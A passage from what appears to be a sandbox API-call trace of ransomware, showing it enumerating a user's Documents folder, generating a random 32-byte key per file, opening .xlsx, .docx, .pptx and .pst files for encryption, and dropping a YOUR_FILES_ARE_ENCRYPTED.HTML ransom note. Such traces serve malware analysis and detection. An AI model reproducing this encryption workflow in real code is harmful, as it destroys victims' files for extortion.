cAlternateFileName="MYVIDE~1")) returned 1 [0124.421] StrStrIW (lpFirst="My Videos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.422] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos") returned 45 [0124.422] GetProcessHeap () returned 0x600000 [0124.422] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.422] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos" [0124.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*" [0124.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x1f96b8f8, ftCreationTime.dwLowDateTime=0x1b809900, ftCreationTime.dwHighDateTime=0x535824, ftLastAccessTime.dwLowDateTime=0x2bfbc620, ftLastAccessTime.dwHighDateTime=0x87631840, ftLastWriteTime.dwLowDateTime=0x39678ee0, ftLastWriteTime.dwHighDateTime=0x19ecd8, nFileSizeHigh=0x8d3187, nFileSizeLow=0x19ed9c, dwReserved0=0x19ec60, dwReserved1=0x32b3d2b, cFileName="", cAlternateFileName="翿")) returned 0xffffffff [0124.422] GetProcessHeap () returned 0x600000 [0124.422] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.422] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x621f8640, ftCreationTime.dwHighDateTime=0x1d700b6, ftLastAccessTime.dwLowDateTime=0x2bb690b0, ftLastAccessTime.dwHighDateTime=0x1d705ea, ftLastWriteTime.dwLowDateTime=0x2bb690b0, ftLastWriteTime.dwHighDateTime=0x1d705ea, nFileSizeHigh=0x0, nFileSizeLow=0x1503b, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="OEhLsf8VY9PmW25.xlsx", cAlternateFileName="OEHLSF~1.XLS")) returned 1 [0124.422] StrStrIW (lpFirst="OEhLsf8VY9PmW25.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.422] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx") returned 56 [0124.422] PathFindExtensionW (pszPath="OEhLsf8VY9PmW25.xlsx") returned=".xlsx" [0124.422] lstrlenW (lpString=".xlsx") returned 5 [0124.422] PathFindExtensionW (pszPath="OEhLsf8VY9PmW25.xlsx") returned=".xlsx" [0124.422] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oehlsf8vy9pmw25.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.423] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=86075) returned 1 [0124.423] GetProcessHeap () returned 0x600000 [0124.423] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.423] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="9F") returned 2 [0124.423] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="45") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="69") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="AA") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E3") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="22") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="F4") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="BE") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="0A") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="68") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="0F") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="57") returned 2 [0124.423] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="64") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="0A") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="21") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="9F") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="58") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="5D") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="78") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="B7") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="AD") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="14") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F1") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="35") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="E9") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="06") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="0A") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C2") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="3C") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="AE") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="88") returned 2 [0124.424] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="3D") returned 2 [0124.424] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx" [0124.424] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.425] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.429] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c71310, ftCreationTime.dwHighDateTime=0x1d6d24c, ftLastAccessTime.dwLowDateTime=0x3701b5c0, ftLastAccessTime.dwHighDateTime=0x1d6f5ab, ftLastWriteTime.dwLowDateTime=0x3701b5c0, ftLastWriteTime.dwHighDateTime=0x1d6f5ab, nFileSizeHigh=0x0, nFileSizeLow=0x174f6, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="OQzXHSs_CGbaL.docx", cAlternateFileName="OQZXHS~1.DOC")) returned 1 [0124.429] StrStrIW (lpFirst="OQzXHSs_CGbaL.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.429] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx") returned 54 [0124.429] PathFindExtensionW (pszPath="OQzXHSs_CGbaL.docx") returned=".docx" [0124.429] lstrlenW (lpString=".docx") returned 5 [0124.429] PathFindExtensionW (pszPath="OQzXHSs_CGbaL.docx") returned=".docx" [0124.429] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oqzxhss_cgbal.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.430] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=95478) returned 1 [0124.430] GetProcessHeap () returned 0x600000 [0124.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.432] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="BC") returned 2 [0124.432] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="2F") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="00") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="88") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="22") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="DB") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="C8") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="80") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="62") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="44") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="FD") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="88") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="F2") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="DB") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="2A") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="EF") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="07") returned 2 [0124.432] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="07") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="DF") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="83") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="F5") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C0") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="B9") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="69") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="9D") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="3E") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="75") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="6E") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="32") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F9") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="E4") returned 2 [0124.433] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="22") returned 2 [0124.433] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx" [0124.433] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.433] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.437] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x65ef9a5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0124.437] StrStrIW (lpFirst="Outlook Files", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.437] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files") returned 49 [0124.437] GetProcessHeap () returned 0x600000 [0124.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.438] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files" [0124.438] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*" [0124.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffc650cf, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0124.439] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xffc650cf, cFileName="..", cAlternateFileName="")) returned 1 [0124.439] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878917cb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x19ec60, dwReserved1=0xffc650cf, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 1 [0124.439] StrStrIW (lpFirst="achoo@gdllo.de.pst", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.439] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst") returned 68 [0124.439] PathFindExtensionW (pszPath="achoo@gdllo.de.pst") returned=".pst" [0124.439] lstrlenW (lpString=".pst") returned 4 [0124.439] PathFindExtensionW (pszPath="achoo@gdllo.de.pst") returned=".pst" [0124.439] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.440] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271360) returned 1 [0124.440] GetProcessHeap () returned 0x600000 [0124.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.440] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="AE") returned 2 [0124.440] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="DF") returned 2 [0124.440] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="FF") returned 2 [0124.440] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C6") returned 2 [0124.440] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="1E") returned 2 [0124.440] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="E2") returned 2 [0124.440] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="FD") returned 2 [0124.440] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="07") returned 2 [0124.440] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="6D") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="A0") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="70") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="FB") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="F8") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C0") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="3A") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="B3") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="B4") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A0") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C6") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="C2") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="AD") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="91") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="6F") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="7A") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="7A") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="5B") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="7A") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C3") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="59") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="9B") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="A3") returned 2 [0124.441] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="28") returned 2 [0124.442] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" [0124.442] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.442] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.442] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878917cb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x19ec60, dwReserved1=0xffc650cf, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 0 [0124.442] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0124.442] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0124.442] GetProcessHeap () returned 0x600000 [0124.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0124.463] WriteFile (in: hFile=0x328, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0124.464] CloseHandle (hObject=0x328) returned 1 [0124.464] GetProcessHeap () returned 0x600000 [0124.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.465] GetProcessHeap () returned 0x600000 [0124.465] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.465] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15dec750, ftCreationTime.dwHighDateTime=0x1d6eb9e, ftLastAccessTime.dwLowDateTime=0x853f1ee0, ftLastAccessTime.dwHighDateTime=0x1d6ee02, ftLastWriteTime.dwLowDateTime=0x853f1ee0, ftLastWriteTime.dwHighDateTime=0x1d6ee02, nFileSizeHigh=0x0, nFileSizeLow=0x7b64, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="s M3dMRVU.pptx", cAlternateFileName="SM3DMR~1.PPT")) returned 1 [0124.465] StrStrIW (lpFirst="s M3dMRVU.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.465] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx") returned 50 [0124.465] PathFindExtensionW (pszPath="s M3dMRVU.pptx") returned=".pptx" [0124.465] lstrlenW (lpString=".pptx") returned 5 [0124.465] PathFindExtensionW (pszPath="s M3dMRVU.pptx") returned=".pptx" [0124.465] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\s m3dmrvu.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.466] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=31588) returned 1 [0124.467] GetProcessHeap () returned 0x600000 [0124.467] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.469] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="14") returned 2 [0124.469] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="A2") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="49") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="A2") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="55") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="A0") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="F0") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="27") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="B0") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="39") returned 2 [0124.469] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="85") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="F9") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="A6") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="EE") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="F7") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="3C") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="32") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="41") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="06") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="36") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="D3") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed4e, 